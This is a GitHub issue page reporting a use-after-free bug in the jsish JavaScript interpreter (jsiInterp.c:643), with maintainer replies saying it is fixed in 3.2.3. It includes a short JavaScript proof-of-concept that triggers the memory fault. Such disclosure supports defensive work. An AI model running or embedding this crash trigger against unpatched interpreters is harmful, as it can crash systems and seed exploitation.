-
Notifications
You must be signed in to change notification settings - Fork 8
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Use After Free in JsiInterp:643 #18
Comments
PoCvar global = this;
(function () {
try {
throw function () {
this.global = 'test';
};
} catch (e) {
}
}());
this.global = 'test'; // trigger use after free |
FossilOrigin-Name: 930e210f5d990ed4953cf49cb9d7528247c0d55d19b9158d60cec49f46649986
Great find of problem from code that was supposed to be removed a long time ago. Fixed in Release "3.2.3" |
The source code I use is http://jsish.org/zip Build EnvironmentUbuntu 16.04 x86_64 |
I probably wasn't clear. I meant yes you did find a problem. But it should be fixed now, in the code I just committed today for "3.2.3".
|
Description
When jsi_DecrRefCount calls the jsi_freeValueEntry function, it incorrectly references the heap block that has been freed by jsi_freeValueEntry (src/jsiInterp.c:643), causing the Use After Free vulnerability
Build Environment
Ubuntu 16.04 x86_64
gcc version 6.5.0 20181026
Debug Information
backtrace
The text was updated successfully, but these errors were encountered: